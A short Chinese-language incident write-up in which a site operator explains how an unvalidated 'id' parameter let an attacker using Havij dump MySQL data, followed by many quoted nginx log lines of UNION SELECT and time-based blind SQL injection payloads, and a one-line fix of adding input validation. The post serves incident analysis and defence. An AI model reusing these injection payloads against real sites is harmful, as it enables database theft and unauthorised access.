mysql 数据库信息泄露

昨天,发现系统被人通过程序漏洞,获取到了数据库的信息,并获取系统的后台登录账号进行了登录。

问题产生的原因是系统一个url存在参数未过滤漏洞,导致别人通过这个url如http://daomain/a.php?xxxxxxxxx&id=23,在通过havij软件获取到了数据库信息。未过滤的参数就是id,在程序中没有做校验。

查找问题的过程,通过分析nginx的log,发现大量如下的代码,其中xxxxxxxxxxx&id=是我的正常的参数

xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--

 

xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D116%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D117%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D120%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D119%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3D118%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C91%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C97%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3C100%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D102%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C5%2C1%29%29%3D101%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C109%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3C112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D114%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D113%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring%28%28database%28%29%29%2C6%2C1%29%29%3D112%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C79%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C103%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C115%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C121%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C124%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3C126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D127%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29
xxxxxxxxxxx&id=26800+and+if%28ascii%28substring+%28%28database%28%29%29%2C6%2C1%29%29%3D126%2CBENCHMARK%2854642%2CMD5%280x41%29%29%2C0%29

 解决办法:

将正常url的参数做了校验,问题解决。

对于被获取到数据库信息的原理可以参考下http://blog.sina.com.cn/s/blog_5ded2e5b01010lkx.html

你可能感兴趣的:(mysql)